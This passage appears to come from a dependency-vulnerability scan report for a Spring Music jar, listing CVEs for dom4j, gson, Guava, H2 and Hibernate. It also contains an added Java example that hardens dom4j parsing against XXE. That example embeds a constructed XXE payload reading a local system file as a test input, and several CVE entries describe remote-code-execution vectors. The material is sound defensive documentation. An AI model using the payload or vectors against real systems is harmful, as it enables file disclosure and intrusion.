Product | pom | developer name | Jakob Jenkov | Low
Product | pom | developer name | James Strachan | Low
Product | pom | developer name | Laramie Crocker | Low
Product | pom | developer name | Maarten Coene | Low
Product | pom | developer name | Michael Skells | Low
Product | pom | developer name | Nick Sanderson | Low
Product | pom | developer name | OuYang Chen | Low
Product | pom | developer name | Steen Lehmann | Low
Product | pom | developer name | Tobias Rademacher | Low
Product | pom | developer name | Todd Wolff | Low
Product | pom | developer name | Yuxin Ruan | Low
Product | pom | developer org | Cronos | Low
Product | pom | developer org | SpiritSoft, Inc. | Low
Product | pom | groupid | dom4j | Highest
Product | pom | groupid | org.zenframework.z8.dependencies.commons | Highest
Product | pom | name | dom4j | High
Product | pom | name | Zenframework Z8 Dependencies - Commons - dom4j-1.6.1 | High
Product | pom | organization name | MetaStuff Ltd. | Low
Product | pom | organization url | http://sourceforge.net/projects/dom4j | Low
Product | pom | parent-artifactid | z8-dependencies | Medium
Product | pom | parent-groupid | org.zenframework.z8.dependencies | Medium
Product | pom | url | http://dom4j.org | Medium
Version | central | version | 1.6.1 | High
Version | file | version | 1.6.1 | High
Version | Manifest | Implementation-Version | 1.6.1 | High
Version | pom | version | 1.6.1 | Highest
CVE-2020-10683
dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3: Base Score: CRITICAL (9.8); Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5); Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
OSSINDEX - [CVE-2020-10683] CWE-611: Improper Restriction of XML External Entity Reference ('XXE')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10683
OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=1694235
NVD reference entries attributed to cve@mitre.org and to source af854a3a-2127-422b-91ae-364da2661108, tagged PATCH, THIRD_PARTY_ADVISORY, ISSUE_TRACKING and RELEASE_NOTES (their URLs are not present in this text)
Vulnerable Software & Versions:
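The CVE text above makes the practical point: dom4j 1.6.1 resolves DTDs and external entities unless the application turns that off. The class below is an added example, not code from the scanned application, from dom4j, or from this report. It builds a SAXReader the way the OWASP XXE prevention guidance describes and runs it against a constructed XXE payload. The feature URIs are the standard Xerces/JDK SAX features; the payload, its file:// path and the album XML are made up for the demo; and the code assumes dom4j 1.6.1 (the version in this jar) on a JDK whose default SAX parser honours these features.

```java
import java.io.StringReader;

import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

/**
 * Hardened dom4j parsing for untrusted XML (mitigation for CVE-2020-10683 on dom4j 1.6.1).
 * Added example; not code from the scanned application or from dom4j itself.
 */
public final class SafeDom4jReader {

    private SafeDom4jReader() {
    }

    /** Returns a SAXReader that refuses any DOCTYPE and never fetches external entities or DTDs. */
    public static SAXReader hardenedReader() throws SAXException {
        SAXReader reader = new SAXReader();
        // Primary control: a DOCTYPE (and therefore any ENTITY declaration) is a fatal parse error.
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that still admit a DOCTYPE: do not resolve anything external.
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // Do not carry DTD declarations into the resulting Document either.
        reader.setIncludeExternalDTDDeclarations(false);
        reader.setIncludeInternalDTDDeclarations(false);
        return reader;
    }

    /** Parses untrusted XML; a DOCTYPE or malformed input surfaces as DocumentException. */
    public static Document parseUntrusted(String xml) throws DocumentException, SAXException {
        return hardenedReader().read(new StringReader(xml));
    }

    // Constructed XXE payload for the demo; the file path is arbitrary.
    private static final String XXE_PAYLOAD =
            "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE album [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]>\n"
            + "<album><title>&xxe;</title></album>";

    // Constructed benign document.
    private static final String BENIGN = "<album><title>Abbey Road</title></album>";

    public static void main(String[] args) throws Exception {
        try {
            parseUntrusted(XXE_PAYLOAD);
            System.out.println("FAIL: DOCTYPE accepted, entity expansion would have been possible");
        } catch (DocumentException e) {
            // Expected: the DOCTYPE is rejected before any entity is declared or resolved.
            System.out.println("rejected: " + e.getMessage());
        }
        Document doc = parseUntrusted(BENIGN);
        System.out.println("title = " + doc.getRootElement().elementText("title"));
    }
}
```

Run it as a plain main class with dom4j on the classpath: the DOCTYPE payload is refused, the benign document parses. Moving to dom4j 2.1.3 or later makes the safe behaviour the library default, but an explicit configuration like this keeps the guarantee independent of the library version and of which SAX implementation JAXP happens to select. Whether the CRITICAL 9.8 rating is reachable in this application at all depends on whether dom4j ever parses attacker-controlled XML, which the report by itself cannot tell you.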
CVE-2018-1000632 (OSSINDEX)
dom4j versions prior to 2.1.1 contain a CWE-91: XML Injection vulnerability in class Element, methods addElement and addAttribute, that can result in an attacker tampering with XML documents through XML injection. The attack appears to be exploitable via an attacker specifying attributes or elements in the XML document. This vulnerability appears to have been fixed in 2.1.1 or later. CWE-91 XML Injection (aka Blind XPath Injection)
CVSSv3: Base Score: HIGH (7.5); Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:dom4j:dom4j:1.6.1:*:*:*:*:*:*:*

spring-music-sqldb-1.0.jar: gson-2.8.2.jar
Description:
Gson JSON library
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/gson-2.8.2.jar
MD5: 2330bde3467e7cfec44d38e74f27dab8
SHA1: 3edcfe49d2c6053a70a2a47e4e1c2f94998a49cf
SHA256: b7134929f7cc7c04021ec1cc27ef63ab907e410cf0588e397b8851181eb91092
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | gson | High
Vendor | jar | package name | google | Highest
Vendor | jar | package name | gson | Highest
Vendor | Manifest | bundle-contactaddress | https://github.com/google/gson | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 | Low
Vendor | Manifest | bundle-symbolicname | com.google.gson | Medium
Vendor | pom | artifactid | gson | Low
Vendor | pom | groupid | com.google.code.gson | Highest
Vendor | pom | name | Gson | High
Vendor | pom | parent-artifactid | gson-parent | Low
Product | file | name | gson | High
Product | jar | package name | google | Highest
Product | jar | package name | gson | Highest
Product | Manifest | bundle-contactaddress | https://github.com/google/gson | Low
Product | Manifest | Bundle-Name | Gson | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 | Low
Product | Manifest | bundle-symbolicname | com.google.gson | Medium
Product | pom | artifactid | gson | Highest
Product | pom | groupid | com.google.code.gson | Highest
Product | pom | name | Gson | High
Product | pom | parent-artifactid | gson-parent | Medium
Version | file | version | 2.8.2 | High
Version | Manifest | Bundle-Version | 2.8.2 | High
Version | pom | version | 2.8.2 | Highest
CVE-2022-25647
The package com.google.code.gson:gson before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2025-53864 (OSSINDEX)
github.com/sigstore/sigstore-java (gson) - Stack-based Buffer Overflow [CVE-2025-53864]
A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function).
CWE-121 Stack-based Buffer Overflow
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.google.code.gson:gson:2.8.2:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: guava-20.0.jar
Description:
Guava is a suite of core and expanded libraries that include
utility classes, google's collections, io classes, and much
much more.
Guava has only one code dependency - javax.annotation,
per the JSR-305 spec.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/guava-20.0.jar
MD5: f32a8a2524620dbecc9f6bf6a20c293f
SHA1: 89507701249388e1ed5ddcf8c41f4ce1be7831ef
SHA256: 36a666e3b71ae7f0f0dca23654b67e086e6c93d192f60ba5dfd5519db6c288c8
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | guava | High
Vendor | jar | package name | google | Highest
Vendor | Manifest | bundle-docurl | https://github.com/google/guava/ | Low
Vendor | Manifest | bundle-symbolicname | com.google.guava | Medium
Vendor | pom | artifactid | guava | Low
Vendor | pom | groupid | com.google.guava | Highest
Vendor | pom | name | Guava: Google Core Libraries for Java | High
Vendor | pom | parent-artifactid | guava-parent | Low
Product | file | name | guava | High
Product | jar | package name | google | Highest
Product | Manifest | bundle-docurl | https://github.com/google/guava/ | Low
Product | Manifest | Bundle-Name | Guava: Google Core Libraries for Java | Medium
Product | Manifest | bundle-symbolicname | com.google.guava | Medium
Product | pom | artifactid | guava | Highest
Product | pom | groupid | com.google.guava | Highest
Product | pom | name | Guava: Google Core Libraries for Java | High
Product | pom | parent-artifactid | guava-parent | Medium
Version | file | version | 20.0 | High
Version | pom | version | 20.0 | Highest
CVE-2023-2976
Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.
Even though the security vulnerability is fixed in version 32.0.0, we recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.
CWE-552 Files or Directories Accessible to External Parties
CVSSv3:
Base Score: HIGH (7.1) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-10237
Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2020-8908
A temp directory creation vulnerability exists in all versions of Guava, allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava API com.google.common.io.Files.createTempDir(). By default, on unix-like systems, the created directory is world-readable (readable by an attacker with access to the system). The method in question has been marked @Deprecated in versions 30.0 and later and should not be used. For Android developers, we recommend choosing a temporary directory API provided by Android, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-732 Incorrect Permission Assignment for Critical Resource
CVSSv3:
Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:1.8/RC:R/MAV:A
CVSSv2:
Base Score: LOW (2.1) Vector: /AV:L/AC:L/Au:N/C:P/I:N/A:N
References:
OSSINDEX - [CVE-2020-8908] CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
OSSIndex - https://github.com/google/guava/issues/4011
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: h2-1.4.197.jar
Description:
H2 Database Engine
License:
MPL 2.0 or EPL 1.0: http://h2database.com/html/license.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/h2-1.4.197.jar
MD5: f9893acfa22b7fe1492dd9c515af2e5b
SHA1: bb391050048ca8ae3e32451b5a3714ecd3596a46
SHA256: 37f5216e14af2772930dff9b8734353f0a80e89ba3f33e065441de6537c5e842
Evidence (Type | Source | Name | Value | Confidence):
Vendor | central | artifactid | h2 | Highest
Vendor | central | groupid | com.h2database | Highest
Vendor | file | name | h2 | High
Vendor | jar | package name | h2 | Highest
Vendor | jar | package name | h2 | Low
Vendor | jar | package name | org | Highest
Vendor | Manifest | bundle-category | jdbc | Low
Vendor | Manifest | bundle-symbolicname | org.h2 | Medium
Vendor | Manifest | implementation-url | http://www.h2database.com | Low
Vendor | Manifest | multi-release | true | Low
Vendor | Manifest | provide-capability | osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory | Low
Vendor | pom | artifactid | h2 | Low
Vendor | pom | developer email | thomas.tom.mueller at gmail dot com | Low
Vendor | pom | developer id | thomas.tom.mueller | Medium
Vendor | pom | developer name | Thomas Mueller | Medium
Vendor | pom | groupid | com.h2database | Highest
Vendor | pom | name | H2 Database Engine | High
Vendor | pom | url | http://www.h2database.com | Highest
Product | central | artifactid | h2 | Highest
Product | file | name | h2 | High
Product | jar | package name | database | Highest
Product | jar | package name | engine | Highest
Product | jar | package name | h2 | Highest
Product | jar | package name | jdbc | Highest
Product | jar | package name | org | Highest
Product | jar | package name | service | Highest
Product | Manifest | bundle-category | jdbc | Low
Product | Manifest | Bundle-Name | H2 Database Engine | Medium
Product | Manifest | bundle-symbolicname | org.h2 | Medium
Product | Manifest | Implementation-Title | H2 Database Engine | High
Product | Manifest | implementation-url | http://www.h2database.com | Low
Product | Manifest | multi-release | true | Low
Product | Manifest | provide-capability | osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory | Low
Product | pom | artifactid | h2 | Highest
Product | pom | developer email | thomas.tom.mueller at gmail dot com | Low
Product | pom | developer id | thomas.tom.mueller | Low
Product | pom | developer name | Thomas Mueller | Low
Product | pom | groupid | com.h2database | Highest
Product | pom | name | H2 Database Engine | High
Product | pom | url | http://www.h2database.com | Medium
Version | central | version | 1.4.197 | Highest
Version | file | version | 1.4.197 | High
Version | Manifest | Bundle-Version | 1.4.197 | High
Version | Manifest | Implementation-Version | 1.4.197 | High
Version | pom | version | 1.4.197 | Highest
CVE-2021-42392
The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C
References:
OSSINDEX - [CVE-2021-42392] CWE-502: Deserialization of Untrusted Data
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42392
OSSIndex - https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
Vulnerable Software & Versions:
CVE-2022-23221
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C
References:
OSSINDEX - [CVE-2022-23221] CWE-88: Argument Injection or Modification
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23221
OSSIndex - https://github.com/advisories/GHSA-45hx-wfhj-473x
OSSIndex - https://github.com/h2database/h2database/releases/tag/version-2.1.210
OSSIndex - https://seclists.org/fulldisclosure/2022/Jan/39
Vulnerable Software & Versions:
CVE-2018-10054
H2 1.4.197, as used in Datomic before 0.9.5697 and other products, allows remote code execution because CREATE ALIAS can execute arbitrary Java code. NOTE: the vendor's position is "h2 is not designed to be run outside of a secure environment."
CWE-20 Improper Input Validation
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2022-45868
The web-based admin console in H2 Database Engine before 2.2.220 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that." Nonetheless, the issue was fixed in 2.2.220.
CWE-312 Cleartext Storage of Sensitive Information
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-14335
An issue was discovered in H2 1.4.197. Insecure handling of permissions in the backup function allows attackers to read sensitive files (outside of their permissions) via a symlink to a fake database file.
CWE-276 Incorrect Default Permissions, CWE-59 Improper Link Resolution Before File Access ('Link Following')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: h2-1.4.197.jar: data.zip: table.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/h2-1.4.197.jar/org/h2/util/data.zip/org/h2/server/web/res/table.js
MD5: 4438d0c12097dae5f3fabd1290c16ec8
SHA1: f8016b15b9e89501baf51e5d9b532da37c21a226
SHA256: d76db45139f9f2beea3afcc1e24437efea061037956c1238d7bb3a4810fae691
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: h2-1.4.197.jar: data.zip: tree.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/h2-1.4.197.jar/org/h2/util/data.zip/org/h2/server/web/res/tree.js
MD5: fb35bd0b4542444661eece734b5a091e
SHA1: e9d387e5abc95c53525b2cf437abca69338e8c9a
SHA256: c0aebf5f276372fa483c7ce5faab50401bf6a75a929ac9c0e072aa23c17b5935
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: hibernate-commons-annotations-5.0.1.Final.jar
Description:
Common reflection code used in support of annotation processing
License:
GNU Lesser General Public License: http://www.gnu.org/licenses/lgpl-2.1.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-commons-annotations-5.0.1.Final.jar
MD5: 2a9d6f5a4ece96557bc4300ecc4486fb
SHA1: 71e1cff3fcb20d3b3af4f3363c3ddb24d33c6879
SHA256: 9431ca05c335f9b6ec550f5d65ad56047a5f336e2d41cce4067591d20c4e51df
Evidence (Type | Source | Name | Value | Confidence):
Vendor | central | artifactid | hibernate-commons-annotations | Highest
Vendor | central | groupid | org.hibernate.common | Highest
Vendor | file | name | hibernate-commons-annotations | High
Vendor | hint analyzer | vendor | redhat | Highest
Vendor | jar | package name | annotations | Highest
Vendor | jar | package name | annotations | Low
Vendor | jar | package name | common | Highest
Vendor | jar | package name | common | Low
Vendor | jar | package name | hibernate | Highest
Vendor | jar | package name | hibernate | Low
Vendor | Manifest | bundle-symbolicname | org.hibernate.common.hibernate-commons-annotations | Medium
Vendor | Manifest | implementation-url | http://hibernate.org | Low
Vendor | Manifest | Implementation-Vendor | Hibernate.org | High
Vendor | Manifest | Implementation-Vendor-Id | org.hibernate | Medium
Vendor | pom | artifactid | hibernate-commons-annotations | Low
Vendor | pom | developer id | hibernate-team | Medium
Vendor | pom | developer name | The Hibernate Development Team | Medium
Vendor | pom | developer org | Hibernate.org | Medium
Vendor | pom | developer org URL | http://hibernate.org | Medium
Vendor | pom | groupid | org.hibernate.common | Highest
Vendor | pom | name | Hibernate Commons Annotations | High
Vendor | pom | organization name | Hibernate.org | High
Vendor | pom | organization url | http://hibernate.org | Medium
Vendor | pom | url | http://hibernate.org | Highest
Product | central | artifactid | hibernate-commons-annotations | Highest
Product | file | name | hibernate-commons-annotations | High
Product | jar | package name | annotations | Highest
Product | jar | package name | annotations | Low
Product | jar | package name | common | Highest
Product | jar | package name | common | Low
Product | jar | package name | hibernate | Highest
Product | jar | package name | reflection | Low
Product | Manifest | Bundle-Name | hibernate-commons-annotations | Medium
Product | Manifest | bundle-symbolicname | org.hibernate.common.hibernate-commons-annotations | Medium
Product | Manifest | implementation-url | http://hibernate.org | Low
Product | pom | artifactid | hibernate-commons-annotations | Highest
Product | pom | developer id | hibernate-team | Low
Product | pom | developer name | The Hibernate Development Team | Low
Product | pom | developer org | Hibernate.org | Low
Product | pom | developer org URL | http://hibernate.org | Low
Product | pom | groupid | org.hibernate.common | Highest
Product | pom | name | Hibernate Commons Annotations | High
Product | pom | organization name | Hibernate.org | Low
Product | pom | organization url | http://hibernate.org | Low
Product | pom | url | http://hibernate.org | Medium
Version | central | version | 5.0.1.Final | Highest
Version | Manifest | Bundle-Version | 5.0.1.Final | High
Version | Manifest | Implementation-Version | 5.0.1.Final | High
Version | pom | version | 5.0.1.Final | Highest
spring-music-sqldb-1.0.jar: hibernate-core-5.2.16.Final.jar
Description:
The core O/RM functionality as provided by Hibernate
License:
GNU Lesser General Public License: http://www.gnu.org/licenses/lgpl-2.1.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-core-5.2.16.Final.jar
MD5: 2020bbd44c74afb12d2e73b8ae20bcd4
SHA1: c169565556721e21e9bdc193a3e8e25160a45468
SHA256: 89312da2f524e0a232610d7452c2ef8c1183ca5955f3ee7690954c872e098d31
Evidence (Type | Source | Name | Value | Confidence):
Vendor | central | artifactid | hibernate-core | Highest
Vendor | central | groupid | org.hibernate | Highest
Vendor | file | name | hibernate-core | High
Vendor | hint analyzer | vendor | redhat | Highest
Vendor | jar | package name | hibernate | Highest
Vendor | jar | package name | hibernate | Low
Vendor | Manifest | bundle-symbolicname | org.hibernate.core | Medium
Vendor | Manifest | implementation-url | http://hibernate.org | Low
Vendor | Manifest | Implementation-Vendor | Hibernate.org | High
Vendor | Manifest | Implementation-Vendor-Id | org.hibernate | Medium
Vendor | Manifest | specification-vendor | Hibernate.org | Low
Vendor | pom | artifactid | hibernate-core | Low
Vendor | pom | developer id | hibernate-team | Medium
Vendor | pom | developer name | The Hibernate Development Team | Medium
Vendor | pom | developer org | Hibernate.org | Medium
Vendor | pom | developer org URL | http://hibernate.org | Medium
Vendor | pom | groupid | org.hibernate | Highest
Vendor | pom | name | Core Hibernate O/RM functionality | High
Vendor | pom | organization name | Hibernate.org | High
Vendor | pom | organization url | http://hibernate.org | Medium
Vendor | pom | url | http://hibernate.org | Highest
Product | central | artifactid | hibernate-core | Highest
Product | file | name | hibernate-core | High
Product | hint analyzer | product | orm | Highest
Product | jar | package name | hibernate | Highest
Product | Manifest | Bundle-Name | hibernate-core | Medium
Product | Manifest | bundle-symbolicname | org.hibernate.core | Medium
Product | Manifest | Implementation-Title | hibernate-core | High
Product | Manifest | implementation-url | http://hibernate.org | Low
Product | Manifest | specification-title | hibernate-core | Medium
Product | pom | artifactid | hibernate-core | Highest
Product | pom | developer id | hibernate-team | Low
Product | pom | developer name | The Hibernate Development Team | Low
Product | pom | developer org | Hibernate.org | Low
Product | pom | developer org URL | http://hibernate.org | Low
Product | pom | groupid | org.hibernate | Highest
Product | pom | name | Core Hibernate O/RM functionality | High
Product | pom | organization name | Hibernate.org | Low
Product | pom | organization url | http://hibernate.org | Low
Product | pom | url | http://hibernate.org | Medium
Version | central | version | 5.2.16.Final | Highest
Version | Manifest | Bundle-Version | 5.2.16.Final | High
Version | Manifest | Implementation-Version | 5.2.16.Final | High
Version | pom | version | 5.2.16.Final | Highest
CVE-2020-25638
A flaw was found in hibernate-core in versions prior to and including 5.4.23.Final. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: HIGH (7.4) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
References:
OSSINDEX - [CVE-2020-25638] CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25638
OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=1881353
OSSIndex - https://hibernate.atlassian.net/browse/HHH-14225
Vulnerable Software & Versions:
CVE-2019-14900
A flaw was found in Hibernate ORM in versions before 5.3.18, 5.4.18 and 5.5.0.Beta1. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: hibernate-jpa-2.1-api-1.0.0.Final.jar
Description:
Clean-room definition of JPA APIs intended for use in developing Hibernate JPA implementation. See README.md for details
License:
Eclipse Public License (EPL), Version 1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License (EDL), Version 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-jpa-2.1-api-1.0.0.Final.jar
MD5: 01b091825023c97fdfd6d2bceebe03ff
SHA1: 5e731d961297e5a07290bfaf3db1fbc8bbbf405a
SHA256: ab46597e3a057f99c8339fffe14c1d27f9dbd2409ae840c62121b00d983c78bd
Evidence (Type | Source | Name | Value | Confidence):
Vendor | central | artifactid | hibernate-jpa-2.1-api | Highest
Vendor | central | groupid | org.hibernate.javax.persistence | Highest
Vendor | file | name | hibernate-jpa-2.1-api-1.0.0.Final | High
Vendor | hint analyzer | vendor | redhat | Highest
Vendor | jar | package name | javax | Highest
Vendor | jar | package name | javax | Low
Vendor | jar | package name | persistence | Highest
Vendor | jar | package name | persistence | Low
Vendor | Manifest | bundle-symbolicname | org.hibernate.javax.persistence.hibernate-jpa-2.1-api | Medium
Vendor | Manifest | Implementation-Vendor | hibernate.org | High
Vendor | pom | artifactid | hibernate-jpa-2.1-api | Low
Vendor | pom | developer email | emmanuel@hibernate.org | Low
Vendor | pom | developer email | hferents@redhat.com | Low
Vendor | pom | developer email | steve@hibernate.org | Low
Vendor | pom | developer id | epbernard | Medium
Vendor | pom | developer id | hardy.ferentschik | Medium
Vendor | pom | developer id | sebersole | Medium
Vendor | pom | developer name | Emmanuel Bernard | Medium
Vendor | pom | developer name | Hardy Ferentschik | Medium
Vendor | pom | developer name | Steve Ebersole | Medium
Vendor | pom | developer org | Red Hat, Inc. | Medium
Vendor | pom | groupid | org.hibernate.javax.persistence | Highest
Vendor | pom | name | Java Persistence API, Version 2.1 | High
Vendor | pom | url | http://hibernate.org | Highest
Product | central | artifactid | hibernate-jpa-2.1-api | Highest
Product | file | name | hibernate-jpa-2.1-api-1.0.0.Final | High
Product | jar | package name | javax | Highest
Product | jar | package name | persistence | Highest
Product | jar | package name | persistence | Low
Product | jar | package name | version | Highest
Product | Manifest | Bundle-Name | hibernate-jpa-2.1-api | Medium
Product | Manifest | bundle-symbolicname | org.hibernate.javax.persistence.hibernate-jpa-2.1-api | Medium
Product | Manifest | Implementation-Title | Java Persistence API | High
Product | Manifest | specification-title | Java Persistence API, Version 2.1 | Medium
Product | pom | artifactid | hibernate-jpa-2.1-api | Highest
Product | pom | developer email | emmanuel@hibernate.org | Low
Product | pom | developer email | hferents@redhat.com | Low
Product | pom | developer email | steve@hibernate.org | Low
Product | pom | developer id | epbernard | Low
Product | pom | developer id | hardy.ferentschik | Low
Product | pom | developer id | sebersole | Low
